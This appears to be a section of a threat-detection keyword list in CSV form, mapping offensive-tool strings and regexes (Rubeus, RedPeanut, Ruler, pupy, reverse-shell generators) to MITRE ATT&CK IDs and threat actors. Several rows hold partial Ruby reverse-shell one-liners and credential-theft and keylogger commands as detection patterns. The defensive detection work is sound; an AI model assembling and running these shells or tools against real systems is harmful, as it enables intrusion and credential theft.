"*RubeusKerberoastMenu*",".{0,1000}RubeusKerberoastMenu.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","57597"
"*RubeusKlistManager*",".{0,1000}RubeusKlistManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","57598"
"*RubeusManager*",".{0,1000}RubeusManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","57599"
"*Rubeus-master*",".{0,1000}Rubeus\-master.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","57600"
"*RubeusMonitorManager*",".{0,1000}RubeusMonitorManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","57601"
"*RubeusMonitorMenu*",".{0,1000}RubeusMonitorMenu.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","57602"
"*Rubeus-obf.exe*",".{0,1000}Rubeus\-obf\.exe.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","1","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","57603"
"*RubeusPttManager*",".{0,1000}RubeusPttManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","57604"
"*RubeusPttMenu*",".{0,1000}RubeusPttMenu.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","57605"
"*RubeusPurgeManager*",".{0,1000}RubeusPurgeManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","57606"
"*RubeusPurgeMenu*",".{0,1000}RubeusPurgeMenu.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","57607"
"*RubeusRenewManager*",".{0,1000}RubeusRenewManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","57608"
"*RubeusRenewMenu*",".{0,1000}RubeusRenewMenu.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","57609"
"*RubeusS4UManager*",".{0,1000}RubeusS4UManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","57610"
"*RubeusS4UMenu*",".{0,1000}RubeusS4UMenu.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","57611"
"*RubeusTgtDelegManager*",".{0,1000}RubeusTgtDelegManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","57612"
"*RubeusTgtDelegMenu*",".{0,1000}RubeusTgtDelegMenu.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","57613"
"*RubeusTriageManager*",".{0,1000}RubeusTriageManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","57614"
"*ruby CVE-202*-*.rb *",".{0,1000}ruby\sCVE\-202.{0,1000}\-.{0,1000}\.rb\s.{0,1000}","offensive_tool_keyword","POC","CVE-2023-34362: MOVEit Transfer Unauthenticated RCE","T1190.001 - T1210.002 - T1068 - T1059.001 - T1059.003","TA0005 - TA0001 - TA0002 - TA0043","N/A","N/A","Exploitation tool","https://github.com/sfewer-r7/CVE-2023-34362","1","0","N/A","N/A","N/A","1","64","23","2024-03-24T00:46:38Z","2023-06-12T12:56:12Z","57615"
"*ruby poc-cve-202*-*.rb*",".{0,1000}ruby\spoc\-cve\-202.{0,1000}\-.{0,1000}\.rb.{0,1000}","offensive_tool_keyword","POC","CVE-2023-34362: MOVEit Transfer Unauthenticated RCE","T1190.001 - T1210.002 - T1068 - T1059.001 - T1059.003","TA0005 - TA0001 - TA0002 - TA0043","N/A","N/A","Exploitation tool","https://github.com/sfewer-r7/CVE-2023-34362","1","0","N/A","N/A","N/A","1","64","23","2024-03-24T00:46:38Z","2023-06-12T12:56:12Z","57616"
"*ruby -rsocket -e '*=TCPSocket.new(*",".{0,1000}ruby\s\-rsocket\s\-e\s\'.{0,1000}\=TCPSocket\.new\(.{0,1000}","offensive_tool_keyword","rsg","reverse shell powershell","T1059.001 - T1203 - T1105 - T1562.001","TA0002 - TA0011","N/A","Black Basta","C2","https://github.com/mthbernardes/rsg","1","0","N/A","N/A","10","10","561","126","2024-05-03T16:33:20Z","2017-12-12T02:57:07Z","57618"
"*ruby -rsocket -e*TCPSocket.new*loop*gets*chomp*IO.popen*read*",".{0,1000}ruby\s\-rsocket\s\-e.{0,1000}TCPSocket\.new.{0,1000}loop.{0,1000}gets.{0,1000}chomp.{0,1000}IO\.popen.{0,1000}read.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","57619"
"*ruby -rsocket -e'f=TCPSocket.open(""${lhost}"",${port}).to_i*",".{0,1000}ruby\s\-rsocket\s\-e\'f\=TCPSocket\.open\(\""\$\{lhost\}\"",\$\{port\}\)\.to_i.{0,1000}","offensive_tool_keyword","Weevely3","Weevely is a web shell designed for post-exploitation purposes that can be extended over the network at runtime","T1059.003 - T1100 - T1071.001 - T1219 - T1078","TA0002 - TA0003 - TA0005 - TA0011 - TA0008","N/A","Sandworm","Resource Development","https://github.com/epinna/weevely3","1","0","N/A","N/A","8","10","3292","612","2024-10-18T04:32:13Z","2014-09-20T10:16:49Z","57620"
"*ruby -rsocket -e'spawn(""/bin/bash"",[:in,:out,:err]=>TCPSocket.new(*",".{0,1000}ruby\s\-rsocket\s\-e\'spawn\(\""\/bin\/bash\"",\[\:in,\:out,\:err\]\=\>TCPSocket\.new\(.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","57621"
"*ruby -rsocket -e'spawn(""/bin/sh"",[:in,:out,:err]=>TCPSocket.new(*",".{0,1000}ruby\s\-rsocket\s\-e\'spawn\(\""\/bin\/sh\"",\[\:in,\:out,\:err\]\=\>TCPSocket\.new\(.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","57622"
"*ruby -rsocket -e'spawn(""bash"",[:in,:out,:err]=>TCPSocket.new(*",".{0,1000}ruby\s\-rsocket\s\-e\'spawn\(\""bash\"",\[\:in,\:out,\:err\]\=\>TCPSocket\.new\(.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","57623"
"*ruby -rsocket -e'spawn(""cmd"",[:in,:out,:err]=>TCPSocket.new(*",".{0,1000}ruby\s\-rsocket\s\-e\'spawn\(\""cmd\"",\[\:in,\:out,\:err\]\=\>TCPSocket\.new\(.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","57624"
"*ruby -rsocket -e'spawn(""powershell"",[:in,:out,:err]=>TCPSocket.new(*",".{0,1000}ruby\s\-rsocket\s\-e\'spawn\(\""powershell\"",\[\:in,\:out,\:err\]\=\>TCPSocket\.new\(.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","57625"
"*ruby -rsocket -e'spawn(""pwsh"",[:in,:out,:err]=>TCPSocket.new(*",".{0,1000}ruby\s\-rsocket\s\-e\'spawn\(\""pwsh\"",\[\:in,\:out,\:err\]\=\>TCPSocket\.new\(.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","57626"
"*ruby -rsocket -e'spawn(""sh"",[:in,:out,:err]=>TCPSocket.new(*",".{0,1000}ruby\s\-rsocket\s\-e\'spawn\(\""sh\"",\[\:in,\:out,\:err\]\=\>TCPSocket\.new\(.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","57627"
"*ruby -rsocket -e'spawn(""zsh"",[:in,:out,:err]=>TCPSocket.new(*",".{0,1000}ruby\s\-rsocket\s\-e\'spawn\(\""zsh\"",\[\:in,\:out,\:err\]\=\>TCPSocket\.new\(.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","57628"
"*ruby_nntpd_cmd_exec*",".{0,1000}ruby_nntpd_cmd_exec.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","57629"
"*ruby_no_sh_reverse_tcp.py*",".{0,1000}ruby_no_sh_reverse_tcp\.py.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","57630"
"*ruby_reverse_tcp.py*",".{0,1000}ruby_reverse_tcp\.py.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","57631"
"*Rudrastra-main.zip*",".{0,1000}Rudrastra\-main\.zip.{0,1000}","offensive_tool_keyword","Rudrastra","Make a Fake wireless access point aka Evil Twin","T1491 - T1090.004 - T1557.001","TA0040 - TA0011 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/SxNade/Rudrastra","1","1","N/A","N/A","8","1","67","21","2023-04-22T15:10:42Z","2020-11-05T09:38:15Z","57632"
"*ruler * abk dump -o *",".{0,1000}ruler\s.{0,1000}\sabk\sdump\s\-o\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","57644"
"*ruler --insecure *",".{0,1000}\/ruler\s\-\-email\s.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","10","2222","362","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z","57645"
"*ruler -k -d * brute --users *",".{0,1000}ruler\s\-k\s\-d\s.{0,1000}\sbrute\s\-\-users\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","57646"
"*ruler -k --nocache --url ",".{0,1000}ruler\s\-k\s\-\-nocache\s\-\-url\s","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","57647"
"*ruler-linux64*",".{0,1000}ruler\-linux64.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","1","#linux","N/A","10","10","2222","362","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z","57648"
"*ruler-linux86*",".{0,1000}ruler\-linux86.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","1","#linux","N/A","10","10","2222","362","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z","57649"
"*ruler-osx64*",".{0,1000}ruler\-osx64.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","10","2222","362","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z","57650"
"*ruler-win64.exe*",".{0,1000}ruler\-win64\.exe.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","10","2222","362","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z","57651"
"*ruler-win86.exe*",".{0,1000}ruler\-win86\.exe.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","10","2222","362","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z","57652"
"*rules/d3ad0ne.rule*",".{0,1000}rules\/d3ad0ne\.rule.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","57653"
"*run * pyshell*",".{0,1000}run\s.{0,1000}\spyshell.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","57654"
"*run android_cam *",".{0,1000}run\sandroid_cam\s.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","57655"
"*run --bg shell_exec*",".{0,1000}run\s\-\-bg\sshell_exec.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","57656"
"*run DNSStager as root*",".{0,1000}run\sDNSStager\sas\sroot.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","Black Basta","Defense Evasion","https://github.com/mhaskar/DNSStager","1","0","N/A","N/A","10","7","613","133","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z","57657"
"*run -Executable *.exe*",".{0,1000}run\s\-Executable\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","57658"
"*run interactive_shell*",".{0,1000}run\sinteractive_shell.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","57659"
"*run keylogger*",".{0,1000}run\skeylogger.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","57660"
"*run memory_exec *.*",".{0,1000}run\smemory_exec\s.{0,1000}\..{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","57661"
